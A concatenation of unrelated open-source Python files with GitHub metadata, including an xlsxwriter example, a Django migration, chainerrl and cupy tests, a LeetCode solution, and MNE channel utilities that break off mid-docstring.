"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
} |
import xlsxwriter

# Create a workbook and add a worksheet.
output_file = 'output/test_formula.xlsx'
workbook = xlsxwriter.Workbook(output_file)
worksheet = workbook.add_worksheet()

# Cell formats: bold for the header row, currency for the amounts.
bold = workbook.add_format({'bold': True})
money = workbook.add_format({'num_format': '$#,##0'})

# Header row (A1:B1).
worksheet.write_row('A1', ('Item', 'Cost'), bold)

# Monthly expense data written below the headers.
expenses = (
    ['Rent', 1000],
    ['Gas', 100],
    ['Food', 300],
    ['Gym', 50],
)

# Data rows start immediately below the header (row index 1).
row = 1
col = 0
for item, cost in expenses:
    worksheet.write(row, col, item)
    worksheet.write(row, col + 1, cost, money)
    row += 1

# Grand total, computed by Excel itself via a formula.
worksheet.write(row, 0, 'Total', bold)
worksheet.write(row, 1, '=SUM(B2:B5)', money)

workbook.close()
| {
"content_hash": "5949b9a96ead176c928efb5baf92bd23",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 53,
"avg_line_length": 24.75,
"alnum_prop": 0.6717171717171717,
"repo_name": "prajesh-ananthan/Tools",
"id": "12a3030efb2bda20a4075253f15336e2c008e8dc",
"size": "990",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "income_worksheet_creator/test/test_formula_on_worksheet.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "25991"
}
],
"symlink_target": ""
} |
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Create the ``PersonRetirement`` model in the ``people_admin`` app."""

    dependencies = [
        ("data", "0035_auto_20210422_1926"),
        ("people_admin", "0006_alter_persondelta_data_changes"),
    ]
    operations = [
        migrations.CreateModel(
            name="PersonRetirement",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                # Retirement date stored as a string (max_length=10 — presumably
                # ISO "YYYY-MM-DD"; TODO confirm against callers).
                ("date", models.CharField(max_length=10)),
                ("is_dead", models.BooleanField()),
                ("is_vacant", models.BooleanField()),
                ("reason", models.TextField()),
                # Deleting a DeltaSet cascades to its retirements.
                (
                    "delta_set",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="person_retirements",
                        to="people_admin.deltaset",
                    ),
                ),
                # Deleting a Person cascades to their retirement record.
                (
                    "person",
                    models.ForeignKey(
                        on_delete=django.db.models.deletion.CASCADE, to="data.person"
                    ),
                ),
            ],
        ),
    ]
| {
"content_hash": "6615b4cbdb547b405c3fe7a47e26a8f0",
"timestamp": "",
"source": "github",
"line_count": 45,
"max_line_length": 85,
"avg_line_length": 31.733333333333334,
"alnum_prop": 0.4096638655462185,
"repo_name": "openstates/openstates.org",
"id": "97c097811409da0655842e41d753d647c0eaaeaf",
"size": "1475",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "people_admin/migrations/0007_personretirement.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2271"
},
{
"name": "Dockerfile",
"bytes": "2731"
},
{
"name": "HTML",
"bytes": "170085"
},
{
"name": "JavaScript",
"bytes": "58627"
},
{
"name": "Jinja",
"bytes": "4114"
},
{
"name": "Procfile",
"bytes": "173"
},
{
"name": "Python",
"bytes": "338617"
},
{
"name": "SCSS",
"bytes": "52406"
},
{
"name": "Shell",
"bytes": "2288"
}
],
"symlink_target": ""
} |
class IView(object):
    """Abstract View component of the MVVM pattern.

    A concrete view renders the state exposed by its view-model.
    """

    def __init__(self):
        super(IView, self).__init__()
        # Back-reference to the view-model; wired up by IViewModel.__init__.
        self.viewmodel = None

    def update(self):
        """
        Main function of the view component in MVVM pattern, draws the contents of the model to the output device.
        """
        raise NotImplementedError()
class IViewModel(object):
    """
    The ViewModel component in MVVM pattern.
    """

    def __init__(self, model, view):
        super(IViewModel, self).__init__()
        # Register with the model so it can notify this view-model of changes.
        self.model = model
        self.model.viewmodels.append(self)
        # Renderable representation of the model; populated by build().
        self.items = None
        self.build()
        # Attach the view last, once the view-model is fully constructed.
        self.view = view
        self.view.viewmodel = self

    def build(self):
        """
        Converts the model to a data structure that can be rendered by the view.
        """
        raise NotImplementedError()
| {
"content_hash": "b3cf3db422bab0b3cfa2d17d6dac4025",
"timestamp": "",
"source": "github",
"line_count": 36,
"max_line_length": 114,
"avg_line_length": 25.444444444444443,
"alnum_prop": 0.5731441048034934,
"repo_name": "pdyban/dicombrowser",
"id": "d4b08889af739d614370b7a476c6bc7a63928940",
"size": "918",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "dicomviewer/iview.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "5213"
},
{
"name": "Python",
"bytes": "23258"
}
],
"symlink_target": ""
} |
"""This file is part of the django ERP project.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
__author__ = 'Emanuele Bertoldi <emanuele.bertoldi@gmail.com>'
__copyright__ = 'Copyright (c) 2013-2015, django ERP Team'
__version__ = '0.0.5'
from django.conf.urls import url
from django.views.generic import TemplateView
from ..urls import urlpatterns
from ..views import SetCancelUrlMixin
class BaseTemplateView(TemplateView):
    """Minimal concrete TemplateView used as a base for the URL test views."""
    template_name = "index.html"
class SetCancelUrlTestView(SetCancelUrlMixin, BaseTemplateView):
    """Test view exercising SetCancelUrlMixin without a preset cancel_url."""
    pass
class PresetSetCancelUrlTestView(SetCancelUrlTestView):
    """Test view with a class-level cancel_url preset."""
    cancel_url = "/go_to_cancel_url/"
# Special urls for test cases.
urlpatterns += [
    # View without a preset cancel_url (the mixin derives one at runtime).
    url(r'^default_cancel_url/', view=SetCancelUrlTestView.as_view(), name="default_cancel_url"),
    # View with a class-level cancel_url preset.
    url(r'^preset_cancel_url/', view=PresetSetCancelUrlTestView.as_view(), name="preset_cancel_url"),
    # Plain view used by tests as a "private" zone endpoint.
    url(r'^private/', view=BaseTemplateView.as_view(), name="private_zone_url"),
]
| {
"content_hash": "4d0db559e0bc6d08a78fd7426e1f2a95",
"timestamp": "",
"source": "github",
"line_count": 38,
"max_line_length": 101,
"avg_line_length": 36.44736842105263,
"alnum_prop": 0.7574007220216606,
"repo_name": "django-erp/django-erp",
"id": "1f59c8869b434ad26d83d9314c8ab83cb6dd7851",
"size": "1407",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "djangoerp/core/tests/urls.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "35186"
}
],
"symlink_target": ""
} |
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from __future__ import absolute_import
from builtins import * # NOQA
from future import standard_library
standard_library.install_aliases() # NOQA
import multiprocessing as mp
import os
import signal
import sys
import unittest
import warnings
import chainer
import chainer.links as L
from chainer import optimizers
import copy
import numpy as np
from chainerrl.misc import async_
class TestAsync(unittest.TestCase):
    """Tests for chainerrl.misc.async_: cross-process parameter/state sharing.

    Pointer identity (``array.ctypes.data``) is used throughout to verify that
    arrays are (or are not) backed by the same shared memory.
    """
    def setUp(self):
        # No shared fixtures are required for these tests.
        pass
    def test_share_params(self):
        """Sharing a model's params makes other models alias the same arrays."""
        # A's params are shared with B and C so that all the three share the
        # same parameter arrays
        model_a = L.Linear(2, 2)
        arrays = async_.share_params_as_shared_arrays(model_a)
        model_b = L.Linear(2, 2)
        model_c = L.Linear(2, 2)
        async_.set_shared_params(model_b, arrays)
        async_.set_shared_params(model_c, arrays)
        a_params = dict(model_a.namedparams())
        b_params = dict(model_b.namedparams())
        c_params = dict(model_c.namedparams())
        def assert_same_pointers_to_data(a, b):
            # Same underlying buffer => same ctypes data pointer.
            self.assertEqual(a['/W'].array.ctypes.data,
                             b['/W'].array.ctypes.data)
            self.assertEqual(a['/b'].array.ctypes.data,
                             b['/b'].array.ctypes.data)
        def assert_different_pointers_to_grad(a, b):
            # Gradients must stay private to each model.
            self.assertNotEqual(a['/W'].grad.ctypes.data,
                                b['/W'].grad.ctypes.data)
            self.assertNotEqual(a['/b'].grad.ctypes.data,
                                b['/b'].grad.ctypes.data)
        # Pointers to parameters must be the same
        assert_same_pointers_to_data(a_params, b_params)
        assert_same_pointers_to_data(a_params, c_params)
        # Pointers to gradients must be different
        assert_different_pointers_to_grad(a_params, b_params)
        assert_different_pointers_to_grad(a_params, c_params)
    def test_share_states(self):
        """Sharing optimizer state makes other optimizers alias the arrays."""
        model = L.Linear(2, 2)
        opt_a = optimizers.RMSprop()
        opt_a.setup(model)
        arrays = async_.share_states_as_shared_arrays(opt_a)
        opt_b = optimizers.RMSprop()
        opt_b.setup(copy.deepcopy(model))
        # In Chainer v2, a model cannot be set up by two optimizers or more.
        opt_c = optimizers.RMSprop()
        opt_c.setup(copy.deepcopy(model))
        # NOTE(review): the string below is a no-op expression statement left
        # as a historical note by the original author; kept verbatim.
        """
        Removed the tests by assert_different_pointers
        since they are trivial now.
        """
        async_.set_shared_states(opt_b, arrays)
        async_.set_shared_states(opt_c, arrays)
        def assert_same_pointers(a, b):
            a = a.target
            b = b.target
            for param_name, param_a in a.namedparams():
                param_b = dict(b.namedparams())[param_name]
                state_a = param_a.update_rule.state
                state_b = param_b.update_rule.state
                self.assertTrue(state_a)
                self.assertTrue(state_b)
                for state_name, state_val_a in state_a.items():
                    state_val_b = state_b[state_name]
                    self.assertTrue(isinstance(
                        state_val_a, np.ndarray))
                    self.assertTrue(isinstance(
                        state_val_b, np.ndarray))
                    self.assertEqual(state_val_a.ctypes.data,
                                     state_val_b.ctypes.data)
        assert_same_pointers(opt_a, opt_b)
        assert_same_pointers(opt_a, opt_c)
    def test_shared_link(self):
        """Check interprocess parameter sharing works if models share links"""
        head = L.Linear(2, 2)
        model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
        model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
        a_arrays = async_.extract_params_as_shared_arrays(
            chainer.ChainList(model_a))
        b_arrays = async_.extract_params_as_shared_arrays(
            chainer.ChainList(model_b))
        print(('model_a shared_arrays', a_arrays))
        print(('model_b shared_arrays', b_arrays))
        head = L.Linear(2, 2)
        model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
        model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
        async_.set_shared_params(model_a, a_arrays)
        async_.set_shared_params(model_b, b_arrays)
        print('model_a replaced')
        a_params = dict(model_a.namedparams())
        for param_name, param in list(a_params.items()):
            print((param_name, param.array.ctypes.data))
        print('model_b replaced')
        b_params = dict(model_b.namedparams())
        for param_name, param in list(b_params.items()):
            print((param_name, param.array.ctypes.data))
        # Pointers to head parameters must be the same
        self.assertEqual(a_params['/0/W'].array.ctypes.data,
                         b_params['/0/W'].array.ctypes.data)
        self.assertEqual(a_params['/0/b'].array.ctypes.data,
                         b_params['/0/b'].array.ctypes.data)
        # Pointers to tail parameters must be different
        self.assertNotEqual(a_params['/1/W'].array.ctypes.data,
                            b_params['/1/W'].array.ctypes.data)
        self.assertNotEqual(a_params['/1/b'].array.ctypes.data,
                            b_params['/1/b'].array.ctypes.data)
    def test_shared_link_copy(self):
        """Deepcopy semantics: link sharing survives only a joint deepcopy."""
        head = L.Linear(2, 2)
        model_a = chainer.ChainList(head.copy(), L.Linear(2, 3))
        model_b = chainer.ChainList(head.copy(), L.Linear(2, 4))
        a_params = dict(model_a.namedparams())
        b_params = dict(model_b.namedparams())
        self.assertEqual(a_params['/0/W'].array.ctypes.data,
                         b_params['/0/W'].array.ctypes.data)
        self.assertEqual(a_params['/0/b'].array.ctypes.data,
                         b_params['/0/b'].array.ctypes.data)
        import copy
        model_a_copy = copy.deepcopy(model_a)
        model_b_copy = copy.deepcopy(model_b)
        a_copy_params = dict(model_a_copy.namedparams())
        b_copy_params = dict(model_b_copy.namedparams())
        # When A and B are separately deepcopied, head is no longer shared
        self.assertNotEqual(a_copy_params['/0/W'].array.ctypes.data,
                            b_copy_params['/0/W'].array.ctypes.data)
        self.assertNotEqual(a_copy_params['/0/b'].array.ctypes.data,
                            b_copy_params['/0/b'].array.ctypes.data)
        model_total_copy = copy.deepcopy(chainer.ChainList(model_a, model_b))
        model_a_copy = model_total_copy[0]
        model_b_copy = model_total_copy[1]
        a_copy_params = dict(model_a_copy.namedparams())
        b_copy_params = dict(model_b_copy.namedparams())
        # When ChainList(A, B) is deepcopied, head is still shared!
        self.assertEqual(a_copy_params['/0/W'].array.ctypes.data,
                         b_copy_params['/0/W'].array.ctypes.data)
        self.assertEqual(a_copy_params['/0/b'].array.ctypes.data,
                         b_copy_params['/0/b'].array.ctypes.data)
    def test_run_async(self):
        """run_async runs the function in 4 processes; counter proves it."""
        counter = mp.Value('l', 0)
        def run_func(process_idx):
            for _ in range(1000):
                with counter.get_lock():
                    counter.value += 1
        async_.run_async(4, run_func)
        self.assertEqual(counter.value, 4000)
    def test_run_async_exit_code(self):
        """Abnormal child exits must be reported via AbnormalExitWarning."""
        def run_with_exit_code_0(process_idx):
            sys.exit(0)
        def run_with_exit_code_11(process_idx):
            # Force a segfault-style death (exit code 11 / SIGSEGV).
            os.kill(os.getpid(), signal.SIGSEGV)
        with warnings.catch_warnings(record=True) as ws:
            async_.run_async(4, run_with_exit_code_0)
            # There should be no AbnormalExitWarning
            self.assertEqual(
                sum(1 if issubclass(
                    w.category, async_.AbnormalExitWarning) else 0
                    for w in ws), 0)
        with warnings.catch_warnings(record=True) as ws:
            async_.run_async(4, run_with_exit_code_11)
            # There should be 4 AbnormalExitWarning
            self.assertEqual(
                sum(1 if issubclass(
                    w.category, async_.AbnormalExitWarning) else 0
                    for w in ws), 4)
| {
"content_hash": "c6912350d358c33e5b98ee8471dff830",
"timestamp": "",
"source": "github",
"line_count": 218,
"max_line_length": 78,
"avg_line_length": 38.206422018348626,
"alnum_prop": 0.574618801776924,
"repo_name": "toslunar/chainerrl",
"id": "6e52de85d56329c9721dae5ec83cbf5b2e4f6369",
"size": "8329",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/misc_tests/test_async.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "837028"
},
{
"name": "Shell",
"bytes": "11208"
}
],
"symlink_target": ""
} |
from __future__ import print_function
# Time: O(n)
# Space: O(1)
# Given a non-negative integer represented as a non-empty array of digits, plus one to the integer.
# You may assume the integer do not contain any leading zero, except the number 0 itself.
# The digits are stored such that the most significant digit is at the head of the list.
# in-place solution
class Solution(object):
    def plusOne(self, digits):
        """Add one to the number represented by ``digits``, in place.

        :type digits: List[int]  # most significant digit first, no leading zeros
        :rtype: List[int]

        Time O(n), space O(1).
        """
        # `range` (not the Python-2-only `xrange`) keeps this Python 3 compatible.
        # Walk from the least significant digit, propagating the carry.
        for i in reversed(range(len(digits))):
            if digits[i] == 9:
                digits[i] = 0
            else:
                digits[i] += 1
                return digits
        # Every digit was 9 (e.g. 999 -> 1000): grow the number by one digit.
        digits[0] = 1
        digits.append(0)
        return digits
# Time: O(n)
# Space: O(n)
class Solution2(object):
    def plusOne(self, digits):
        """Add one to the number represented by ``digits``.

        Works on a reversed copy so the carry propagates left-to-right,
        then reverses back. Returns a new list; the input is not mutated.

        :type digits: List[int]
        :rtype: List[int]

        Time O(n), space O(n).
        """
        result = digits[::-1]
        carry = 1
        # `range` (not the Python-2-only `xrange`) keeps this Python 3 compatible.
        for i in range(len(result)):
            result[i] += carry
            carry, result[i] = divmod(result[i], 10)
        if carry:
            # A carry remains after the last digit (e.g. 999 + 1).
            result.append(carry)
        return result[::-1]
# Ad-hoc smoke test: 9999 + 1 -> [1, 0, 0, 0, 0].
if __name__ == "__main__":
    print(Solution().plusOne([9, 9, 9, 9]))
| {
"content_hash": "c7c68bb62fce9e9f881aaec25ad9c2f6",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 99,
"avg_line_length": 27.195652173913043,
"alnum_prop": 0.5419664268585132,
"repo_name": "tudennis/LeetCode---kamyu104-11-24-2015",
"id": "335dcaf534e68a39ec4d2bfe1c20fc017eb7b5f8",
"size": "1251",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "Python/plus-one.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "980817"
},
{
"name": "Go",
"bytes": "1907"
},
{
"name": "Java",
"bytes": "8367"
},
{
"name": "Python",
"bytes": "1365305"
},
{
"name": "SQLPL",
"bytes": "822"
},
{
"name": "Shell",
"bytes": "3218"
}
],
"symlink_target": ""
} |
import unittest
import numpy
from cupy import testing
# Note that numpy.bincount does not support uint64 as it casts an input array
# to int64.
# All dtypes exercised by these tests except uint64 (numpy.bincount casts its
# input to int64, so uint64 is unsupported — see the note above).
_except_uint64 = (
    numpy.float16, numpy.float32, numpy.float64,
    numpy.int8, numpy.int16, numpy.int32, numpy.int64,
    numpy.uint8, numpy.uint16, numpy.uint32,
    numpy.bool_)
def for_dtypes_except_uint64(name='dtype'):
    """Decorator: run the test once per supported dtype, excluding uint64."""
    return testing.for_dtypes(_except_uint64, name=name)
def for_dtypes_combination_except_uint64(names):
    """Decorator: run the test for all dtype combinations, excluding uint64."""
    return testing.helper.for_dtypes_combination(_except_uint64, names=names)
@testing.gpu
class TestHistogram(unittest.TestCase):
    """Tests for ``bincount``: cupy results are compared against numpy
    (via the ``numpy_cupy_allclose`` / ``numpy_cupy_raises`` decorators)."""

    # NOTE(review): presumably tells the (nose-style) runner this class may be
    # split across processes — confirm the current runner honors it.
    _multiprocess_can_split_ = True
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_allclose()
    def test_bincount(self, xp, dtype):
        x = testing.shaped_arange((3,), xp, dtype)
        return xp.bincount(x)
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_allclose()
    def test_bincount_duplicated_value(self, xp, dtype):
        x = xp.array([1, 2, 2, 1, 2, 4], dtype)
        return xp.bincount(x)
    @for_dtypes_combination_except_uint64(names=['x_type', 'w_type'])
    @testing.numpy_cupy_allclose()
    def test_bincount_with_weight(self, xp, x_type, w_type):
        x = testing.shaped_arange((3,), xp, x_type)
        w = testing.shaped_arange((3,), xp, w_type)
        return xp.bincount(x, weights=w)
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_allclose()
    def test_bincount_with_minlength(self, xp, dtype):
        x = testing.shaped_arange((3,), xp, dtype)
        return xp.bincount(x, minlength=5)
    @for_dtypes_combination_except_uint64(names=['x_type', 'w_type'])
    @testing.numpy_cupy_raises()
    def test_bincount_invalid_weight_length(self, xp, x_type, w_type):
        # weights shorter than x must raise in both numpy and cupy.
        x = testing.shaped_arange((1,), xp, x_type)
        w = testing.shaped_arange((2,), xp, w_type)
        return xp.bincount(x, weights=w)
    @testing.for_signed_dtypes()
    @testing.numpy_cupy_raises()
    def test_bincount_negative(self, xp, dtype):
        # bincount rejects negative input values.
        x = testing.shaped_arange((3,), xp, dtype) - 2
        return xp.bincount(x)
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_raises()
    def test_bincount_too_deep(self, xp, dtype):
        # 2-D input is invalid.
        x = xp.array([[1]], dtype)
        return xp.bincount(x)
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_raises()
    def test_bincount_too_small(self, xp, dtype):
        # 0-D input is invalid.
        x = xp.zeros((), dtype)
        return xp.bincount(x)
    @for_dtypes_except_uint64()
    @testing.numpy_cupy_raises()
    def test_bincount_zero_minlength(self, xp, dtype):
        x = testing.shaped_arange((3,), xp, dtype)
        return xp.bincount(x, minlength=0)
| {
"content_hash": "6e4235357a8416acbf82df7b323e31d8",
"timestamp": "",
"source": "github",
"line_count": 84,
"max_line_length": 77,
"avg_line_length": 31.80952380952381,
"alnum_prop": 0.6482035928143712,
"repo_name": "muupan/chainer",
"id": "920e3c82e31a049d94ab7f15856c8f1857ae1658",
"size": "2672",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "tests/cupy_tests/statics_tests/test_histogram.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "18613"
},
{
"name": "Cuda",
"bytes": "6118"
},
{
"name": "Python",
"bytes": "1222891"
}
],
"symlink_target": ""
} |
import os
import os.path as op
import warnings
import numpy as np
from scipy import sparse
from ..externals.six import string_types
from ..utils import verbose, logger
from ..io.pick import (channel_type, pick_info, pick_types,
_check_excludes_includes)
from ..io.constants import FIFF
def _get_meg_system(info):
    """Educated guess for the helmet type based on channels"""
    for ch in info['chs']:
        if ch['kind'] != FIFF.FIFFV_MEG_CH:
            continue
        coil_type = ch['coil_type'] & 0xFFFF
        if coil_type == FIFF.FIFFV_COIL_NM_122:
            return '122m'
        if coil_type // 1000 == 3:  # All Vectorview coils are 30xx
            return '306m'
        if coil_type in (FIFF.FIFFV_COIL_MAGNES_MAG,
                         FIFF.FIFFV_COIL_MAGNES_GRAD):
            # Magnes systems are told apart by their MEG channel count.
            nmag = np.sum([c['kind'] == FIFF.FIFFV_MEG_CH
                           for c in info['chs']])
            return 'Magnes_3600wh' if nmag > 150 else 'Magnes_2500wh'
        if coil_type == FIFF.FIFFV_COIL_CTF_GRAD:
            return 'CTF_275'
        if coil_type == FIFF.FIFFV_COIL_KIT_GRAD:
            return 'KIT'
        if coil_type == FIFF.FIFFV_COIL_BABY_GRAD:
            return 'BabySQUID'
    # Nothing recognized: fall back to the Vectorview 306 default.
    return '306m'
def _contains_ch_type(info, ch_type):
    """Check whether a certain channel type is in an info object

    Parameters
    ----------
    info : instance of mne.io.meas_info.Info
        The measurement information.
    ch_type : str
        the channel type to be checked for

    Returns
    -------
    has_ch_type : bool
        Whether the channel type is present or not.
    """
    if not isinstance(ch_type, string_types):
        raise ValueError('`ch_type` is of class {actual_class}. It must be '
                         '`str`'.format(actual_class=type(ch_type)))
    valid_channel_types = ['grad', 'mag', 'planar1', 'planar2', 'eeg', 'stim',
                           'eog', 'emg', 'ecg', 'ref_meg', 'resp', 'exci',
                           'ias', 'syst', 'seeg', 'misc']
    if ch_type not in valid_channel_types:
        raise ValueError('ch_type must be one of %s, not "%s"'
                         % (valid_channel_types, ch_type))
    if info is None:
        raise ValueError('Cannot check for channels of type "%s" because info '
                         'is None' % (ch_type,))
    # Scan every channel; True as soon as one of the requested type is found.
    return any(channel_type(info, ii) == ch_type
               for ii in range(info['nchan']))
def _get_ch_type(inst, ch_type):
"""Helper to choose a single channel type (usually for plotting)
Usually used in plotting to plot a single datatype, e.g. look for mags,
then grads, then ... to plot.
"""
if ch_type is None:
for type_ in ['mag', 'grad', 'planar1', 'planar2', 'eeg']:
if type_ in inst:
ch_type = type_
break
else:
raise RuntimeError('No plottable channel types found')
return ch_type
@verbose
def equalize_channels(candidates, verbose=None):
    """Equalize channel picks for a collection of MNE-Python objects

    Parameters
    ----------
    candidates : list
        List of Raw | Epochs | Evoked | AverageTFR instances.
    verbose : None | bool
        Whether to be verbose or not.

    Notes
    -----
    This function operates inplace.
    """
    from ..io.base import _BaseRaw
    from ..epochs import _BaseEpochs
    from ..evoked import Evoked
    from ..time_frequency import AverageTFR
    if not all(isinstance(c, (_BaseRaw, _BaseEpochs, Evoked, AverageTFR))
               for c in candidates):
        valid = ['Raw', 'Epochs', 'Evoked', 'AverageTFR']
        raise ValueError('candidates must be ' + ' or '.join(valid))
    # Use the instance with the most channels as the name template.
    chan_max_idx = np.argmax([c.info['nchan'] for c in candidates])
    chan_template = candidates[chan_max_idx].ch_names
    logger.info('Identifying common channels ...')  # fixed typo "Identiying"
    channels = [set(c.ch_names) for c in candidates]
    common_channels = set(chan_template).intersection(*channels)
    # Drop, in place, every channel that is not common to all candidates.
    dropped = list()
    for c in candidates:
        drop_them = list(set(c.ch_names) - common_channels)
        if drop_them:
            c.drop_channels(drop_them)
            dropped.extend(drop_them)
    if dropped:
        dropped = list(set(dropped))
        logger.info('Dropped the following channels:\n%s' % dropped)
    else:
        logger.info('all channels are corresponding, nothing to do.')
class ContainsMixin(object):
    """Mixin class for Raw, Evoked, Epochs
    """
    def __contains__(self, ch_type):
        """Check channel type membership"""
        # 'meg' is an umbrella type: present if either mags or grads are.
        if ch_type == 'meg':
            return (_contains_ch_type(self.info, 'mag') or
                    _contains_ch_type(self.info, 'grad'))
        return _contains_ch_type(self.info, ch_type)
class SetChannelsMixin(object):
    """Mixin class for Raw, Evoked, Epochs
    """
    def _get_channel_positions(self, picks=None):
        """Gets channel locations from info
        Parameters
        ----------
        picks : array-like of int | None
            Indices of channels to include. If None (default), all meg and eeg
            channels that are available are returned (bad channels excluded).
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        if picks is None:
            picks = pick_types(self.info, meg=True, eeg=True)
        chs = self.info['chs']
        # First 3 entries of 'loc' are the sensor position (x, y, z).
        pos = np.array([chs[k]['loc'][:3] for k in picks])
        n_zero = np.sum(np.sum(np.abs(pos), axis=1) == 0)
        if n_zero > 1:  # XXX some systems have origin (0, 0, 0)
            raise ValueError('Could not extract channel positions for '
                             '{} channels'.format(n_zero))
        return pos
    def _set_channel_positions(self, pos, names):
        """Update channel locations in info
        Parameters
        ----------
        pos : array-like | np.ndarray, shape (n_points, 3)
            The channel positions to be set.
        names : list of str
            The names of the channels to be set.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        if len(pos) != len(names):
            raise ValueError('Number of channel positions not equal to '
                             'the number of names given.')
        # NOTE(review): np.float is deprecated/removed in modern NumPy;
        # consider plain `float`. Left unchanged here.
        pos = np.asarray(pos, dtype=np.float)
        if pos.shape[-1] != 3 or pos.ndim != 2:
            msg = ('Channel positions must have the shape (n_points, 3) '
                   'not %s.' % (pos.shape,))
            raise ValueError(msg)
        for name, p in zip(names, pos):
            if name in self.ch_names:
                idx = self.ch_names.index(name)
                self.info['chs'][idx]['loc'][:3] = p
            else:
                msg = ('%s was not found in the info. Cannot be updated.'
                       % name)
                raise ValueError(msg)
    def set_channel_types(self, mapping):
        """Define the sensor type of channels.
        Note: The following sensor types are accepted:
            ecg, eeg, emg, eog, exci, ias, misc, resp, seeg, stim, syst
        Parameters
        ----------
        mapping : dict
            a dictionary mapping a channel to a sensor type (str)
            {'EEG061': 'eog'}.
        Notes
        -----
        .. versionadded:: 0.9.0
        """
        # Lookup tables: human-readable type -> FIFF kind / unit constants.
        human2fiff = {'ecg': FIFF.FIFFV_ECG_CH,
                      'eeg': FIFF.FIFFV_EEG_CH,
                      'emg': FIFF.FIFFV_EMG_CH,
                      'eog': FIFF.FIFFV_EOG_CH,
                      'exci': FIFF.FIFFV_EXCI_CH,
                      'ias': FIFF.FIFFV_IAS_CH,
                      'misc': FIFF.FIFFV_MISC_CH,
                      'resp': FIFF.FIFFV_RESP_CH,
                      'seeg': FIFF.FIFFV_SEEG_CH,
                      'stim': FIFF.FIFFV_STIM_CH,
                      'syst': FIFF.FIFFV_SYST_CH}
        human2unit = {'ecg': FIFF.FIFF_UNIT_V,
                      'eeg': FIFF.FIFF_UNIT_V,
                      'emg': FIFF.FIFF_UNIT_V,
                      'eog': FIFF.FIFF_UNIT_V,
                      'exci': FIFF.FIFF_UNIT_NONE,
                      'ias': FIFF.FIFF_UNIT_NONE,
                      'misc': FIFF.FIFF_UNIT_V,
                      'resp': FIFF.FIFF_UNIT_NONE,
                      'seeg': FIFF.FIFF_UNIT_V,
                      'stim': FIFF.FIFF_UNIT_NONE,
                      'syst': FIFF.FIFF_UNIT_NONE}
        unit2human = {FIFF.FIFF_UNIT_V: 'V',
                      FIFF.FIFF_UNIT_NONE: 'NA'}
        ch_names = self.info['ch_names']
        # first check and assemble clean mappings of index and name
        for ch_name, ch_type in mapping.items():
            if ch_name not in ch_names:
                raise ValueError("This channel name (%s) doesn't exist in "
                                 "info." % ch_name)
            c_ind = ch_names.index(ch_name)
            if ch_type not in human2fiff:
                raise ValueError('This function cannot change to this '
                                 'channel type: %s. Accepted channel types '
                                 'are %s.' % (ch_type,
                                              ", ".join(human2unit.keys())))
            # Set sensor type
            self.info['chs'][c_ind]['kind'] = human2fiff[ch_type]
            unit_old = self.info['chs'][c_ind]['unit']
            unit_new = human2unit[ch_type]
            # Warn when the change of type also changes the channel's unit.
            if unit_old != human2unit[ch_type]:
                warnings.warn("The unit for Channel %s has changed "
                              "from %s to %s." % (ch_name,
                                                  unit2human[unit_old],
                                                  unit2human[unit_new]))
            self.info['chs'][c_ind]['unit'] = human2unit[ch_type]
            # EEG-like channels get an EEG coil type; all others get none.
            if ch_type in ['eeg', 'seeg']:
                self.info['chs'][c_ind]['coil_type'] = FIFF.FIFFV_COIL_EEG
            else:
                self.info['chs'][c_ind]['coil_type'] = FIFF.FIFFV_COIL_NONE
    def rename_channels(self, mapping):
        """Rename channels.
        Parameters
        ----------
        mapping : dict | callable
            a dictionary mapping the old channel to a new channel name
